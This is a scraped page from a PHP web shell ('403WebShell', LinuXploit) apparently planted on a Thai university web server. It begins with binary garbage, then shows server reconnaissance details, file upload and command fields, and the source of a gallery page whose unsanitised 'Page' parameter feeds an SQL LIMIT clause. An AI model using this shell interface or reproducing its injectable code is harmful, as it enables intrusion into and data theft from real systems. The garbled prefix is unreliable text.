h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/igallery_cc.php
<?php include 'header.php';?>
<?php include 'dbnews.php';?>
<?php
function MonthThai($strMonth)
{
	$strMonthName = Array("","ม.ค.","ก.พ","มี.ค.","เม.ย.","พ.ค.","มิ.ย.","ก.ค.","ส.ค.","ก.ย.","ต.ค.","พ.ย.","ธ.ค.");
	$strMonthThai=$strMonthName[$strMonth];
	return $strMonthThai;
}	
	$num_string_detail = 200;
?>
			<!-- gallery -->
			<section class="blog_w3ls pt-3 pb-5 py-5" id="gallery">
				<div class="container pb-xl-5 pb-lg-3 py-xl-5 py-lg-3">
					<h3 class="title text-uppercase text-center text-bl mb-5 pb-xl-3">ภาพกิจกรรมศูนย์คอมพิวเตอร์</h3>
					<div class="row">
					
<?php	
	$serverName = "localhost";
	$dbName = "igallery";
	$conn = mysqli_connect($serverName,$userName,$userPassword,$dbName);
	mysqli_set_charset($conn,"utf8");
   
	$sql = "SELECT * from gallery";
	//$sql .= " WHERE album_id=2";
	$sql .= " WHERE (album_id=2 AND (exhibition_type_id=1 OR exhibition_type_id=2) )";
	$sql .= " ORDER BY gallery_date DESC";
	//$sql .= " LIMIT 12";
	$query = mysqli_query($conn,$sql);

	$num_rows = mysqli_num_rows($query);

	$per_page = 12;   // Per Page
	$page  = 1;
	
	if(isset($_GET["Page"]))
	{
		$page = $_GET["Page"];
	}

	$prev_page = $page-1;
	$next_page = $page+1;

	$row_start = (($per_page*$page)-$per_page);
	if($num_rows<=$per_page)
	{
		$num_pages =1;
	}
	else if(($num_rows % $per_page)==0)
	{
		$num_pages =($num_rows/$per_page) ;
	}
	else
	{
		$num_pages =($num_rows/$per_page)+1;
		$num_pages = (int)$num_pages;
	}

	$row_end = $per_page;

	$sql .= " LIMIT $row_start ,$row_end";
	$query = mysqli_query($conn,$sql);		
	
	while($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
	{
		$gallery_date_thai = date('j', strtotime($result["gallery_date"])) . " " . MonthThai(date('n', strtotime($result["gallery_date"]))) . " " . (date('Y', strtotime($result["gallery_date"]))+543);			
		if ($result["gallery_url"]=="") {
			$gallery_url = "https://arit.skru.ac.th/arit/igallery/image_view.php?id=" . $result["gallery_id"];
		} else {
			$gallery_url = $result["gallery_url"];
		}	
		$sql2 = "SELECT * from gallery_image";
		$sql2 .= " WHERE (gallery_id=" . $result["gallery_id"] . ") AND (is_cover_image=1)";
		$query2 = mysqli_query($conn,$sql2);
		if ($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
		{
			$cover_image = "arit/igallery/image_gallery/" . $result["gallery_id"] . "/" . $result2["image_file"];
		}
		else
		{
			$sql2 = "SELECT * from gallery_image";
			$sql2 .= " WHERE (gallery_id=" . $result["gallery_id"] . ")";
			$sql2 .= " ORDER BY image_order ASC";
			$query2 = mysqli_query($conn,$sql2);
			if ($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
			{
				$cover_image = "arit/igallery/image_gallery/" . $result["gallery_id"] . "/" . $result2["image_file"];
			}	
			else
			{
				$cover_image = "";
			}	
		}	
?>
						<div class="col-lg-4 col-md-6 pb-3">
							<div class="card border-0 med-blog">
								<div class="card-header p-0">
									<a href="<?php echo $gallery_url;?>">
										<img class="card-img-bottom" src="<?php echo $cover_image;?>" alt="image">
									</a>
								</div>
								<div class="card-body border border-top-0">
									<!--<div class="mb-3">
										<h5 class="blog-title card-title font-weight-bold m-0">
											<a href="https://arit.skru.ac.th/arit/aritnews/exhibition_detail.php?exhibition_id=<?php //echo $exhibition_id;?>"><?php //echo $exhibition_name;?></a>
										</h5>
										<div class="blog_w3icon">
											<span>Jan 12, 2019 - loremipsum</span>
										</div>
									</div>-->
									<p><?php echo $result["gallery_name"];?>&nbsp;<font color="#009900">[<?php echo $gallery_date_thai;?>]</font>&nbsp;...<a href="<?php echo $gallery_url;?>">อ่านต่อ</a></p>
								</div>
							</div>
						</div>							
<?php
	} //end while
?>					
					</div>

<br><p align="center">จำนวน <?php echo $num_rows;?> รายการ : <?php echo $num_pages;?> หน้า</p>
	<ul class="pagination justify-content-center">

<?php
if($prev_page)
{
	//echo " <a href='$_SERVER[SCRIPT_NAME]?Page=$prev_page&txtKeyword=$strKeyword'><< Back</a> ";
?>
      <li class="page-item">
        <a class="page-link" href="<?php echo $_SERVER[SCRIPT_NAME] . "?Page=" . $prev_page . "&id=" . $gallery_id;?>" aria-label="Previous">
          <span aria-hidden="true">&laquo;</span>
          <span class="sr-only">Previous</span>
        </a>
      </li>
<?php	
}

for($i=1; $i<=$num_pages; $i++){
	if($i != $page)
	{
		//echo "[ <a href='$_SERVER[SCRIPT_NAME]?Page=$i&txtKeyword=$strKeyword'>$i</a> ]";
?>
      <li class="page-item">
        <a class="page-link" href="<?php echo $_SERVER[SCRIPT_NAME] . "?Page=" . $i . "&id=" . $gallery_id;?>"><?php echo $i;?></a>
      </li>		
<?php
	}
	else
	{
		//echo "<b> $i </b>";
?>
      <li class="page-item">
        <a class="page-link"><?php echo $i;?></a>
      </li>			
<?php
	}
}
if($page!=$num_pages)
{
	//echo " <a href ='$_SERVER[SCRIPT_NAME]?Page=$next_page&txtKeyword=$strKeyword'>Next>></a> ";
?>
      <li class="page-item">
        <a class="page-link" href="<?php echo $_SERVER[SCRIPT_NAME] . "?Page=" . $next_page . "&id=" . $gallery_id;?>" aria-label="Next">
          <span aria-hidden="true">&raquo;</span>
          <span class="sr-only">Next</span>
        </a>
      </li>
<?php
}							
?>					
        </ul>	

				</div>
			</section>
			<!-- //gallery -->	
					
<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit